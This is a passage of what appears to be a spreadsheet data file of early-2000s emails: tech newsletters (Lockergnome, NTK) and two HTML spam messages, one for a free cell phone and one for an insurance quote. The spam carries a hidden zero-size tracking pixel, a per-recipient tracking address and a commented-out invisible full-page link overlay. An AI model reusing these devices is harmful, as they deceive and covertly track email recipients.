 &lt;b&gt;GET WINDOWS XP TIPS:&lt;/b&gt; Months after the release of Windows XP Professional and Home editions, people are still learning the nuances of Microsoft's newest operating system. Whether you've been using it for a while or are planning to upgrade to the new OS soon, this ebook is right up your alley. 
 &lt;a href="   http://store.eSellerate.net/s.asp?s=STR550611850&amp;Cmd=BUY&amp;SKURefnum=SKU3000768669&amp;AFFIDC=AFF669529939"&gt;GET YOUR COPY&lt;/a&gt; 
 of Lockergnome's Top 50 Windows XP tips now!    
 &lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/p&gt;
 &lt;!-- GnomeALERTZ --&gt;
 &lt;p&gt;&lt;br&gt;&lt;table bgcolor="#FFCC99" border="0" cellspacing="0" cellpadding="0" width="100%"&gt;&lt;tr&gt;&lt;td&gt;&lt;p class="title"&gt;&amp;nbsp;GnomeALERTZ&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;p&gt;
 &lt;b&gt;Today's Top 5 kbAlertz&lt;/b&gt;
 &lt;p&gt;&lt;ul&gt;
 &lt;li&gt;&lt;a class="url" href="http://www.kbAlertz.com/redir.aspx?kbnumber=Q292108"&gt;Q292108 - WD2002: GetSpellingSuggestions Method Does Not List Non-English Language Suggestions (Q292108)&lt;/a&gt;&lt;/li&gt;
 &lt;li&gt;&lt;a class="url" href="http://www.kbAlertz.com/redir.aspx?kbnumber=Q290981"&gt;Q290981 - WD2002: "File Conversion Encoding" Dialog Box Appears When You Open Text File (Q290981)&lt;/a&gt;&lt;/li&gt;
 &lt;li&gt;&lt;a class="url" href="http://www.kbAlertz.com/redir.aspx?kbnumber=Q290969"&gt;Q290969 - WD2002: Run-Time Error 5 When You Use Mid(), Left(), or Right() Function (Q290969)&lt;/a&gt;&lt;/li&gt;
 &lt;li&gt;&lt;a class="url" href="http://www.kbAlertz.com/redir.aspx?kbnumber=Q290967"&gt;Q290967 - WD2002: Cannot Place a Bullet in the Middle of a Sentence or Paragraph (Q290967)&lt;/a&gt;&lt;/li&gt;
 &lt;li&gt;&lt;a class="url" href="http://www.kbAlertz.com/redir.aspx?kbnumber=Q201953"&gt;Q201953 - WD2000: Macro to Find Automatic (Soft) Page Breaks (Q201953)&lt;/a&gt;&lt;/li&gt;
 &lt;/ul&gt;&lt;/p&gt;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&lt;b&gt;Technical Censorship&lt;/b&gt;
 &lt;p&gt;&lt;a class="url" href="http://news.com.com/2100-1023-944315.html"&gt;http://news.com.com/2100-1023-944315.html&lt;/a&gt;
 &lt;p&gt;Odd. I liked that cup of Mocha (spelled M-O-C-H-A and I'll explain in a minute) I drank at Starbucks when Jake and I visited last week, but if I wanted to relay that to someone using a Yahoo email account, you might see an alternate word. Thus the additional hyphenated spelling just in case those of you using Yahoo to subscribe to Lockergnome actually received your issues and the word has been altered to suit their personal opinion of my choice in drinks. They've also had a terrible time interpretting our W3C standardized HTML lately, dropping in copious #message references throughout the text in their new Beta email client. So why the text replacement? It's another filtering technique to stop certain words that might relate to JavaScript functions. I guess I'll have to choose another beverage next time. Silly me.
 &lt;!-- GnomeSTUFF --&gt;
 &lt;p&gt;&lt;br&gt;&lt;table bgcolor="#FFCC99" border="0" cellspacing="0" cellpadding="0" width="100%"&gt;&lt;tr&gt;&lt;td&gt;&lt;p class="title"&gt;&amp;nbsp;GnomeSTUFF&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;p&gt;
 &lt;b&gt;Yer Kidding... Really?&lt;/b&gt;
 &lt;p&gt;&lt;a class="url" href="http://www.theregus.com/content/4/25629.html"&gt;http://www.theregus.com/content/4/25629.html&lt;/a&gt;
 &lt;p&gt;I'm all sorts of sarcastic today, aren't I? Those of us 
 that have had to manage budgets are used to dealing with 
 math in terms of hardware, software, maintenance and 
 personnel costs. It's not really that difficult. It's 
 certainly not hard to see that dropping a free version of 
 Linux on a server with less hardware requirements just to do 
 some file sharing, printing and maybe an Intranet page or 
 three is far cheaper than using Windows. At very long last, 
 Microsoft has admitted as much. Of course, they're quick to 
 point out that they have much more to offer than Linux, 
 which may indeed be true. But at the end of the day, when 
 you compare donuts to donuts and like functions against one 
 another, Linux is cheaper. For a shop of Windows-trained 
 staff, dealing with Linux will certainly be a challenge, 
 requiring additional training, suffer the odd blunder here 
 and there, and be less forgiving when it comes to detailed 
 configuration. On the same token, make a Linux whiz use 
 Windows and see how quickly you'll be searching for a 
 replacement. Cheap is in the budget of the beholder.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href="http://www.lockergnome.com/issues/techspecialist/20020718.html"&gt;http://www.lockergnome.com/issues/techspecialist/20020718.html&lt;/a&gt;
 &lt;p&gt;Your subscribed e-mail address is: [qqqqqqqqqq-lg@example.com]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</si>
  <si>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Smitten
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://diveintomark.org/archives/2002/10/02.html#smitten
 Date: 2002-10-02T09:49:49-05:00
 _Heather Hamilton_: Hypochondriac[1]. &amp;#8220;It is because of my dog that I 
 have been smitten with an Ovarian Cyst&amp;reg;; it is because of my dog that my 
 husband can't breathe with phlegm-free lungs. I can safely blame the dog for 
 everything.&amp;#8221;
 [1] http://www.dooce.com/mtarchives/10_01_2002.html
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Friend, Get this Cell Phone for Free!
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"&gt;
 &lt;!-- saved from url=(0061)http://www.weginc.com/la/misc/IDS%20cellular/ids06/ids06.html --&gt;
 &lt;HTML&gt;&lt;HEAD&gt;
 &lt;META http-equiv=Content-Type content="text/html; charset=iso-8859-1"&gt;
 &lt;META content="MSHTML 6.00.2712.300" name=GENERATOR&gt;
 &lt;/HEAD&gt;
 &lt;BODY leftMargin=0 topMargin=0 MARGINHEIGHT="0" MARGINWIDTH="0"&gt;
 &lt;TABLE cellSpacing=0 cellPadding=0 border=0 align="center"&gt;
   &lt;TBODY&gt; 
   &lt;TR&gt;
     &lt;TD&gt;&lt;A href="http://click.mm53.com/sp/t.pl?id=3244:7552100"&gt;&lt;IMG height=270 src="http://209.126.159.62/ids06_1.gif" width=195 border=0&gt;&lt;/A&gt;&lt;/TD&gt;
     &lt;TD colSpan=3&gt;&lt;A href="http://click.mm53.com/sp/t.pl?id=3245:7552100"&gt;&lt;IMG height=270 src="http://209.126.159.62/ids06_2.gif" width=205 border=0&gt;&lt;/A&gt;&lt;/TD&gt;&lt;/TR&gt;
   &lt;TR&gt;
     &lt;TD colSpan=2&gt;&lt;A href="http://click.mm53.com/sp/t.pl?id=3246:7552100"&gt;&lt;IMG height=56 src="http://209.126.159.62/ids06_3.gif" width=295 border=0&gt;&lt;/A&gt;&lt;/TD&gt;
     &lt;TD&gt;&lt;A href="http://click.mm53.com/sp/t.pl?id=3247:7552100"&gt;&lt;IMG height=56 src="http://209.126.159.62/anim6_4.gif" width=104 border=0&gt;&lt;/A&gt;&lt;/TD&gt;
     &lt;TD&gt;&lt;A href="http://click.mm53.com/sp/t.pl?id=3248:7552100"&gt;&lt;IMG height=56 src="http://209.126.159.62/ids06_5.gif" width=1 border=0&gt;&lt;/A&gt;&lt;/TD&gt;&lt;/TR&gt;
   &lt;TR&gt;
     &lt;TD&gt;&lt;A href="http://click.mm53.com/sp/t.pl?id=3249:7552100"&gt;&lt;IMG height=174 src="http://209.126.159.62/ids06_6.gif" width=195 border=0&gt;&lt;/A&gt;&lt;/TD&gt;
     &lt;TD colSpan=3&gt;&lt;A href="http://click.mm53.com/sp/t.pl?id=3250:7552100"&gt;&lt;IMG height=174 src="http://209.126.159.62/ids06_7.gif" width=205 border=0&gt;&lt;/A&gt;&lt;/TD&gt;&lt;/TR&gt;
   &lt;TR&gt;
     &lt;TD&gt;&lt;IMG height=1 src="http://209.126.159.62/space.gif" width=195 border=0&gt;&lt;/TD&gt;
     &lt;TD&gt;&lt;IMG height=1 src="http://209.126.159.62/space.gif" width=100 border=0&gt;&lt;/TD&gt;
     &lt;TD&gt;&lt;IMG height=1 src="http://209.126.159.62/space.gif" width=104 border=0&gt;&lt;/TD&gt;
     &lt;TD&gt;&lt;IMG height=1 src="http://209.126.159.62/space.gif" width=1 
   border=0&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;
 &lt;img src="file:///C|/Documents%20and%20Settings/Administrator.DEEP-THOUGHT.000/Local%20Settings/Temporary%20Internet%20Files/Content.IE5/YX8FE9Q5/top%5B1%5D.gif" width="1" height="6"&gt;
 &lt;IMG SRC="http://click.mm53.com/sp/t.pl?id=3251:7552100&amp;o=1" BORDER=0 WIDTH=0 HEIGHT=0&gt; &lt;BR&gt;&lt;P&gt;&lt;BR&gt;&lt;!-- 
 SKY-Email-Address: cypherpunks@einstein.ssz.com 
 SKY-Database: OnlyTheBest
 --&gt;
 &lt;A NAME='unsub'&gt;
 &lt;TABLE align=center border=1 cellpadding=5 cellspacing=0 bordercolor=gray&gt;
 &lt;TD&gt;&lt;TABLE width="600" align=center cellpadding="0" cellspacing="0" border="0" &gt;&lt;TR&gt;
 &lt;TD height=25&gt;&lt;FONT size="2" face="arial,sans-serif" color=gray&gt;Remove yourself from this recurring list by:&lt;/FONT&gt;&lt;/TD&gt;
 &lt;/TR&gt;&lt;TR&gt;
 &lt;TD&gt;&lt;FONT color="gray" size="2" face="arial,sans-serif"&gt;&lt;A href="mailto:unsub-7552100-335@mm53.com"&gt;Clicking here&lt;/A&gt; to send a blank email to unsub-7552100-335@mm53.com&lt;/FONT&gt;&lt;/TD&gt;
 &lt;/TR&gt;&lt;TR&gt;
 &lt;TD align="center"&gt;&lt;FONT size="2" face="arial,sans-serif"&gt;&lt;I&gt;OR&lt;/I&gt;&lt;/FONT&gt;&lt;/TD&gt;
 &lt;/TR&gt;&lt;TR&gt;
 &lt;TD&gt;&lt;FONT face="arial,sans-serif" color="gray" size="2"&gt;Sending a postal mail to CustomerService, 427-3 Amherst Street, Suite 319, Nashua, NH 03063&lt;/FONT&gt;&lt;/TD&gt;
 &lt;/TR&gt;&lt;TR&gt;
 &lt;TD align="CENTER"&gt;&lt;br&gt;&lt;FONT face="arial,sans-serif" size="2" color="black"&gt;&lt;I&gt;This message was sent to address cypherpunks@einstein.ssz.com&lt;/I&gt;&lt;/FONT&gt;&lt;/TD&gt;
 &lt;/TR&gt;&lt;/TABLE&gt;&lt;/TD&gt;&lt;/TABLE&gt;
  &lt;/BODY&gt;&lt;/HTML&gt;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</si>
  <si>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NTK now, 2002-07-19
</t>
  </si>
  <si>
    <t xml:space="preserve">
  _   _ _____ _  __ &lt;*the* weekly high-tech sarcastic update for the uk&gt;
 | \ | |_   _| |/ / _ __   __2002-07-19_ o join! mail an empty message to
 |  \| | | | | ' / | '_ \ / _ \ \ /\ / / o ntknow-subscribe@lists.ntk.net
 | |\  | | | | . \ | | | | (_) \ v  v /  o website (+ archive) lives at:
 |_| \_| |_| |_|\_\|_| |_|\___/ \_/\_/   o     http://www.ntk.net/
         "Until we secure our cyber infrastructure, a few keystrokes and
          an Internet connection is all one needs to disable the economy
          and endanger lives..."
                                               - Lamar Smith, US Senator
                              http://www.msnbc.com/news/780923.asp?cp1=1
          &gt; DISABLE ECONOMY
          &gt; You cannot do that here.
          &gt; EXAMINE CYBER INFRASTRUCTURE
          &gt; Access Denied.
          &gt; HIT ECONOMY WITH STICK
                                 &gt;&gt; HARD NEWS &lt;&lt;
                                life-long pursuits
          On July 17th, 2001, DMITRY SKLYAROV, coder for the Russian
          software house ELCOMSOFT, was arrested while visiting the
          US. His crime: writing code that exposed flaws in Adobe's
          e-book security, in contravention of the USA's exciting new
          DMCA. In the next year, thanks to widespread protests, Adobe
          withdrew their call to prosecute the Russian hacker and
          Dmitry was freed. Elcomsoft is still in the dock for
          breaching Adobe's copy restriction routines. If the aim of
          the prosecution was to cow them into keeping quiet about
          security problems, it doesn't appear to have worked. On July
          12th, 2002, ELCOMSOFT posted to Bugtraq a flaw in Adobe's
          e-book security. Namely, that in Adobe's "lending library"
          web app for the Adobe Content Server, you can borrow a book
          for over twenty years (instead of three days) just by
          changing a hidden Web form value. The library site is just a
          demonstration app, so it's not a serious problem, but it
          does give Elcomsoft room for a catty little addendum. "Some
          time ago", they write "we have found much more serious
          problem with another Adobe software and reported it to the
          vendor; however, there was no response at all, and so we
          decided not to waste our time reporting this one (about the
          library) to Adobe". How much reaction do they want?
          Salt sown in the soil of Moscow and the Volga canal aflame?
          http://lists.insecure.org/bugtraq/2002/Jul/0133.html
                            - don't plan any trips to Disneyland, Vlad
          http://librarydemo.adobe.com/library/
                           - fixed, it looks, by stubbing out the code
          http://lists.insecure.org/bugtraq/2002/Jul/0193.html
 - now, for real chutzpah, post a Symantec exploit on the newly 0wn3d BugTraq
          We'll tread cautiously with this one, as it involves Vast
          Ageless Corporations Who Have Retained Counsel Living Where
          Their Glowing Eyesockets Used To Be. Just days before we
          read on Slashdot that zombie company FORGENT is demanding
          patent license fees for users of JPEG, we're contacted by
          someone who has received a similiarly threatening letter -
          this time, from the rather more established Lucent
          Technologies. The message reads: "After some market research
          it has come to our attention that some of your company's
          products may employ the JBIG/JPEG Standard. Therefore,
          Lucent Technologies GRL LLC, Lucent's licensing agent, is
          contacting your company regarding your interest in obtaining
          a license for patents." What follows is the usual demand for
          fees, dire threats if compliance is thwarted, requests that
          the guards seize the criminals and throw them in Patent
          Dungeon, etc. Now, Lucent's patents don't seem to be
          breached by a JPEG implementaton (although it's known that
          JBIG is patent-encumbered; hence JBIG-2). So why does Lucent
          bring up JPEG at all? A curious wording for sure, and we'd
          be interested to see if anyone else has been contacted in
          these terms. Mail us at tips@spesh.com if you have.
          http://slashdot.org/article.pl?sid=02/07/18/157217
        - best use of porn collection in slashdot post modded funny +5
 http://www.ghostscript.com/pipermail/gs-devel/2002-February/001203.html
                                           - JBIG encumbered, JBIG2 no
          Oh, is it time again already for Esquire's 50 Sharpest Men
          2002? Joy! Hidden among the usual suspects - which include
          Richard Dawkins ("scientist"), Kevin Warwick ("scientist"),
          Kevin Eldon ("comedian" - and KING OF HOBBIES), is one 
          Charlie Brooker (listed here as a "TV Go Home"). Merely 
          appearing in the list seems to have prompted the reclusive,
          unsmiling, and often violent comedian to hurredly post a 
          TVGoHome update from his pile of cardboard boxes near Soho,
          which is all to the good. But does he really deserve the title?
          What *is* sharpness? "In case your are [sic] in any doubt", 
          the site explains, "sharpness is, above all, an attitude". Now
          the dictionary says it's also "having a bitter taste", and
          "harshness of manner", and given that Hank, the Angry
          Drunken Dwarf is both unlisted and dead, we think Brooker's
          a show-in for the Web protest/mess-with-publisher's-heads
          vote. We urge you to vote now, express the will of the
          people, and win some vile perfume or a horrible watch.
          http://www.esquire.co.uk/esquire50.htm
            - warning: torturous and unnecessarilly prolonged web form
          http://www.thebee.com/bweb/iinfo106.htm
 - Hank: another exciting Net meme you missed because you go out too much
                                 &gt;&gt; ANTI-NEWS &lt;&lt;
                              berating the obvious
          when oh when will the public tire of PUERILE GOOGLE TYPOS?: 
          http://www.google.com/search?q=overcocking , "addtition", 
          "t-shits", "eductation", and (via prudish spellcheckers?): 
          http://www.google.com/search?q=%22public+lice%22 ... don't buy: 
      http://www.ebuyer.com/customer/products/index.html?product_uid=26497
          ... bringing a whole new meaning to "colour naming systems": 
          http://www.ntk.net/2002/07/19/dohhue.gif ... might explain its 
          bewildered state: http://www.ntk.net/2002/07/19/dohpot.gif ... 
          http://www.contactnet.ro/solutiixxi/index.php?lim=e vs "On our 
          children's game-place, they can romp after hug-desire!!": 
          http://www.tourismus-tirol.com/scharnitz/risserhof/indexe.html 
          ... self-fulfilling: http://www.ntk.net/2002/07/19/dohdig.gif 
          ... and when VIM met the PALM platform, the "Related E-Books" 
          were MOIDER: http://www.ntk.net/2002/07/19/dohvim.gif ... 
                                &gt;&gt; EVENT QUEUE &lt;&lt;
                          goto's considered non-harmful
          Yes, we have concerns about encountering Slashdot readers "au 
          naturel" without any kind of intervening moderation system. 
          And yet, at the same time, we cannot look away. 7pm local 
          time, Thu 2002-07-25 marks the world's first SLASHDOT MEETUP 
          EVENT (check local listings for details, free), attracting - 
          at time of writing - an impressive 91 interested signups for 
          the London gathering (19 for Manchester, Leeds 17, Glasgow 11, 
          Birmingham 9, Liverpool 6, and so on). Usual warnings about 
          meeting your online "friends" are, we imagine, more than 
          usually applicable here - especially as no-one can work out 
          what the organisers are getting out of it. Spamming lists? 
          Kickbacks from the democratically selected venues? Or valuable 
          demographic info like the fact that "Elijah Wood" is currently 
          more popular in hobbit-friendly Glasgow than U2, Tori Amos, or 
          Duran Duran? 
          http://slashdot.meetup.com/
                                   - #goth girls for bearded sysadmins
          http://www.defcon.org/
                             - plus Defcon in Vegas in two weeks' time
                                 &gt;&gt; TRACKING &lt;&lt;
                sufficiently advanced technology : the gathering
          Once again that silly 5K Web competition thing gets the
          headlines. And once again, we must rub its fatty, fatty chin
          against the honed shard of flint that is the 2002 1K
          MINIGAME 8-BIT CODING COMPETITION until it's shaved meek.
          1024 bytes is all you (must have) wrote: to enter, arrange
          them to form a working game on any 8-bit micro you choose.
          In response to complaints from last year, "middle class BBC
          Micro Fauntleroys" will be permitted, says last year's
          judge, Matt Westcott. More weakness is shown by permitting
          Atari 2600s, which have 2K cartridges, to enter (you must
          fill the last 1K with zeros), and also the TI99/4A which as
          everyone knows has sixteen bits. We do hope this doesn't end
          in Zork virtual machines or Postscript or something.
          http://www.ffd2.com/minigame/
                    - "The competition will never be 'fair'" - BETTER!
          http://entries.the5k.org/946/wolf5k.html
                                                   - oh, the decadence
          http://www.igf.com/submit.htm
 - $20,000 prize money; probably not accepting Oric Forth games this year
                                 &gt;&gt; MEMEPOOL &lt;&lt;
                 ceci n'est pas une http://www.gagpipe.com/
          "Now That's What I Call Copyright Infringement, Vols 1,2,3": 
          http://pod-135.dolphin-server.co.uk/~boom/thecd/boom.php ... 
          http://news.bbc.co.uk/hi/english/uk/2131236.stm - a case for: 
          http://news.bbc.co.uk/hi/english/uk/newsid_1490000/1490957.stm ?
          ... forget offshore accounting - what's to stop them going back 
          in time with the proceeds and killing all the investors' 
          grandfathers?: http://www.timetravelfund.com/ ... telnet 
          econet: http://www.heyrick.co.uk/econet/misc/tcpip.html ... 
          ... you know, wouldn't a simple 404 attract less attention?: 
          http://www.ttfn.com/ ... Transformers! Terrorists in disguise! 
          http://www.tsa.gov/workingwithtsa/aircraft_prohibit.shtm ... 
          obligatory filk Pie cover: http://home.mchsi.com/~jeffwadler/ 
          ... they laughed when I sat down at the VT100 terminal: 
          http://www.prodikeys.com/ ... and kept laughing, thanks to: 
          http://www.colorpilot.com/sound.html ...
                                 &gt;&gt; GEEK MEDIA &lt;&lt;
                    what, *another* http://www.tvgohome.com/ ?
          TV&gt;&gt; now that kids are taking over from teachers in RULE THE 
          SCHOOL (5pm, Fri, BBC1) and redecorating their homes in HOME 
          ON THEIR OWN (7pm, Sat, ITV), we can't wait for the concept 
          gameshows where they fly planes, run pubs and perform 
          lifesaving surgery... Wired UK's Hari Kunzru reappears on 
          NEWSNIGHT REVIEW (11pm, Fri, BBC2)... and if you like James 
          "Copland" Mangold's sensitive character study of an overweight 
          man HEAVY (1.05am, Fri, BBC2), the IMDB also recommends Eddie 
          Murphy's "The Nutty Professor"... The Beach Boys' "Pet Sounds" 
          is the subject of ART THAT SHOOK THE WORLD (7.20pm, Sat, 
          BBC2), even though it doesn't have "Good Vibrations" on it... 
          Meg Ryan experiments with setting a romantic comedy during the 
          Gulf War, and where one of the protagonists is dead, in 
          COURAGE UNDER FIRE (9.15pm, Sat, BBC1)... but we'd skip that - 
          along with laboured Tim Burton homage MARS ATTACKS! (10.35pm, 
          Sat, ITV) - in favour of Ensign Ro and Kevin Spacey - together 
          at last! - in top-notch low-budget office horror SWIMMING WITH 
          SHARKS (10.50pm, Sat, C5)... Radha "Pitch Black" Mitchell 
          shows up in Aussie relo-drama LOVE AND OTHER CATASTROPHES 
          (1.05am, Sat, BBC2)... Matt "Max Headroom" Frewer fails to 
          halt the downward slide of the "National Lampoon" franchise in 
          Washington excursion NATIONAL LAMPOON'S SENIOR TRIP (12.30am, 
          Sat, ITV), compared to acknowledged classics like NATIONAL 
          LAMPOON'S VACATION (9pm, Tue, C5)... the final of JUNKYARD 
          WARS (8pm, Mon, C4) offers a taste of where these shows are 
          going when the teams must build full-size remote-controlled 
          "combat cars"... while a "I Preferred The Terrorism Of The 
          1980s" special recreates the SAS - EMBASSY SIEGE (9pm, Thu, 
          BBC2) - if only everything was as simple as pseudo-'70s 
          supernatural action comedy GOOD VS EVIL (9pm, Wed, Sci-Fi)... 
          FILM&gt;&gt; David Cronenberg explains why the "Friday The 13th" 
          machete murderer is so hard to kill, shortly before he goes up 
          against two of the chicks from "Gene Roddenberry's Andromeda" 
          in undemanding self-referential "Alien"-alike JASON X 
          ( http://www.cndb.com/movie.html?title=Jason+X+%282001%29 : 
          [Lexa "Andromeda" Doig] [is] flat on her back on a table 
          recuperating, and the camera shows her boobs; [Lisa "Beka 
          Valentine"] Ryder plays a robot who wants to be more of a 
          woman [...] her nipples fall off for a little comic relief)... 
          while the director of "Candyman" and UK hacker classic "Smart 
          Money" digital-videos drug-fuelled Hollywood self-excoriation 
          IVANS XTC ( http://www.cndb.com/movie.html?title=ivans+xtc : 
          [Lisa Enos], who also wrote the screenplay and whose first 
          film this is, appears in a few full frontal scenes a little 
          more than a third of the way through)... otherwise it's star-
          packed CGI talking animal interspecies romance STUART LITTLE 2 
          (imdb: sequel/ anthropomorphic/ based-on-novel/ bird/ mouse/ 
          part-computer-animation/ soccer)... or odd-sounding Oirish 
          period frolic THE ABDUCTION CLUB ( http://www.bbfc.co.uk/ : 
          Cuts required to sight of 2 men hanging by necks in execution 
          scene, on grounds of potentially harmful imitable technique, 
          [in accordance with] category standards and Video Recordings 
          Act 1984)... 
          CONFECTIONERY THEORY&gt;&gt; as tastebuds acclimatise to the 
          acquired tang of DIET COKE LEMON, reader WAYNE WILLIAMS has 
          been forced to look further afield for his acidic thrills, 
          proclaiming the "Citrus" version of ROWNTREE'S FRUITSOME 
          CEREAL BARS "pretty tasty, a bit like a lemon meringue pie in 
          a bar". Frankly we preferred the "Tropical" and "Red Berry" 
          variants, though neither as much as the various ALPEN BARS 
          with "yoghurt" or "chocolate" style toppings - and all for 
          just twice the fat of ordinary breakfast cereal! In other 
          most-important-meal-of-the-day news, those eggy "breakfast 
          pizza" CHICAGO TOWN SCRAMBLES [NTK 2002-04-12] are delicious 
          (particularly with tomato ketchup), and have been flying off 
          the shelves in a 2-pack for 99p deal in selected branches of 
          Sainsbury's... as predicted in NTK 2001-08-10, KFC have taken 
          advantage of MCDONALD'S weakness in the KITKAT MCFLURRY arena, 
          and rolled out their identically-sized rival AVALANCHE (also 
          99p) with a freakish selection of toppings including chocolate 
          sauce, Cadbury's Flake, M&amp;M's and Starburst Joosters. In a 
          non-ice-cream-related incident, CHARLOTTE LATIMER was the 
          first to contact us with a sighting of STARBURST "straight-
          out-of-the-1993-naming-dept" FLIPSTERS HARD CANDY (from 
          30p/pack): "pretty nice hard candies (peach, apple, raspberry 
          and forest fruits) with a yucky plastic-looking splodge on one 
          side that purports to offer some kind of creaminess (we 
          guess)", but still no news yet of the brand's other mutant 
          offspring: teardrop-shaped FRUITINESSE (from 49p), non-fish-
          flavoured gummy SEA MONSTERS (from 99p/bag), and STARBURST 
          CAKE BARS (UKP1.05 for pack of 5)... and finally, MIKE WALSH 
          of Finland remained nonplussed with last month's UK sighting 
          of an imported South African NESTLE SMARTIES IN MILKYBAR 
          CHOCOLATE, maintaining he bought a White "Ritter Sport" bar 
          with Smarties in, "in a branch of the (German) Spar chain in 
          Tenerife in January", and was generally disappointed by its 
          usability: "Smarties kept falling out", he complains. But 
          Nestle is innovating over here as well, with the imminent 
          arrival of WONKA XPLODER and GOLDEN CRUNCHER biscuits (79p/ 
          pack of 6) - replacing underperforming former NTK "Taste 
          Abominations" WONKA OOMPA sweets - and its first new chocolate 
          launch in 5 years, solid-looking would-be Dairy Milk-killer 
          NESTLE DOUBLE CREAM (40p, available from July 29)... 
                                &gt;&gt; SMALL PRINT &lt;&lt;
        Need to Know is a useful and interesting UK digest of things that
          happened last week or might happen next week. You can read it
        on Friday afternoon or print it out then take it home if you have
      nothing better to do. It is compiled by NTK from stuff they get sent.
                        Registered at the Post Office as
                                    '"funny"'
                          http://www.net-watch.org/1.htm               
                                  NEED TO KNOW
             THEY STOLE OUR REVOLUTION. NOW WE'RE STEALING IT BACK.
                          Archive - http://www.ntk.net/
               Unsubscribe? Mail ntknow-unsubscribe@lists.ntk.net
                 Subscribe? Mail ntknow-subscribe@lists.ntk.net
  NTK now is supported by UNFORTU.NET, and by you: http://www.geekstyle.co.uk/
                           (K) 2002 Special Projects.
              Copying is fine, but include URL: http://www.ntk.net/
                     Tips, news and gossip to tips@spesh.com
              All communication is for publication, unless you beg.
               Press releases from naive PR people to pr@spesh.com
      Remember: Your work email may be monitored if sending sensitive material.
        Sending &gt;500KB attachments is forbidden by the Geneva Convention.
               Your country may be at risk if you fail to comply.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Insurance Quote Site
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0//EN"&gt;
 &lt;html&gt;
 &lt;head&gt;
 &lt;title&gt;quotepool insurance&amp;#153;&lt;/title&gt;
 &lt;style&gt;
 &lt;!--
 td {
 	font-family: Verdana, Tahoma, sans-serif;
 	font-size: 11px;
 	color: black;
 }
 text {
 	font-family: Verdana, Tahoma, sans-serif;
 	font-size: 11px;
 	color: black;
 }
 text2 {
 	font-family: Verdana, Tahoma, sans-serif;
 	font-size: 12px;
 	color: black;
 }
 footer {
 	font-family: Verdana, Tahoma, sans-serif;
 	font-size: 10px;
 	color: white;
 	font-weight: bold;
 }
 a.footer {color: white; text-decoration: none;}
 a.footer:visited {color: white; text-decoration: none;}
 a.footer:hover {color: white; text-decoration: underline;}
 button {
 	font-size: 11px;
 	border-width: 0;
 	background-color: #476f8f;
 	color: white;
 	font-family: Verdana, Tahoma, sans-serif;
 	font-weight: bold;
 }
 #selected {
 	color: #F5989D;
 	text-decoration: none;
 }
 clicker {cursor: hand}
 div {position: absolute; z-index: 190; width: 640; top: 0; left: 0; overfl=
 ow: hidden;}
 span {position: absolute; z-index: 200; width: 100%; top: 0; left: 0;}
 a {color: white; text-decoration: none;}
 //--&gt;
 &lt;/style&gt;
 &lt;/head&gt;
 &lt;body leftmargin=3D0 topmargin=3D0 marginwidth=3D0 marginheight=3D0&gt;
 &lt;div&gt;
 &lt;!--
 &lt;span&gt;
 &lt;center&gt;&lt;a href=3D"http://u-need-life-insurance.com/"&gt;&lt;img src=3D"http://u=
 -need-life-insurance.com/1x1.gif" width=3D700 height=3D1400 border=3D0&gt;&lt;/a=
 &gt;&lt;/center&gt;
 &lt;/span&gt;
 --&gt;
 &lt;table width=3D"100%" cellspacing=3D0 cellpadding=3D0 border=3D0&gt;&lt;tr&gt;&lt;td b=
 gcolor=3D#A9AFA2&gt;
 &lt;center&gt;
 &lt;br&gt;
 &lt;table width=3D540 cellspacing=3D0 cellpadding=3D0 border=3D0&gt;
 &lt;tr&gt;
 &lt;td&gt;&lt;img src=3D"http://u-need-life-insurance.com/top.gif" width=3D540 heig=
 ht=3D272 alt=3D"" border=3D0&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;&lt;td bgcolor=3Dwhite align=3Dcenter&gt;
 &lt;table width=3D470 cellspacing=3D0 cellpadding=3D0 border=3D0&gt;
 &lt;tr&gt;
 &lt;td align=3Dleft class=3Dtext&gt;
 &lt;br&gt;&lt;img src=3D"http://u-need-life-insurance.com/what_we_do.gif" width=3D1=
 03 height=3D17 alt=3D"what we do:"&gt;&lt;br&gt;
 &lt;p&gt;We will attempt to provide you with the best quote you can possibly get=
 ! Our team of companies and their agents will provide a no-nonsense approa=
 ch to your insurance needs. If all you want to do is ask a few questions, =
 then they will be glad to help. They can also ease your mind and provide t=
 he insurance quickly and effortlessly. Either way, you will be glad you fi=
 lled out our quick, no-obligation quote form! 
 &lt;p&gt;&lt;img src=3D"http://u-need-life-insurance.com/why.gif" width=3D206 heigh=
 t=3D20 alt=3D"what you need insurance:"&gt;&lt;br&gt;
 &lt;p&gt;Life insurance should be an essential part of any financial plan. The p=
 urpose is to protect your family's income, in the case of your death. Life=
  Insurance can also be used for financial strength while you are still ali=
 ve. It's a foundation for a strong financial portfolio! In either case, th=
 e proceeds could be used to:
 &lt;br&gt;&lt;br&gt;
 &lt;table cellspacing=3D4 cellpadding=3D0 border=3D0&gt;
 &lt;tr&gt;&lt;td valign=3Dtop&gt;&lt;img src=3D"http://u-need-life-insurance.com/bullet.g=
 if" width=3D17 height=3D17 border=3D0 vspace=3D2&gt;&lt;/td&gt;&lt;td class=3Dtext&gt;&lt;b&gt;=
 Meet your children's college expenses!&lt;/b&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;tr&gt;&lt;td valign=3Dtop&gt;&lt;img src=3D"http://u-need-life-insurance.com/bullet.g=
 if" width=3D17 height=3D17 border=3D0 vspace=3D2&gt;&lt;/td&gt;&lt;td class=3Dtext&gt;&lt;b&gt;=
 Ensure comfortable retirement for your spouse!&lt;/b&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;tr&gt;&lt;td valign=3Dtop&gt;&lt;img src=3D"http://u-need-life-insurance.com/bullet.g=
 if" width=3D17 height=3D17 border=3D0 vspace=3D2&gt;&lt;/td&gt;&lt;td class=3Dtext&gt;&lt;b&gt;=
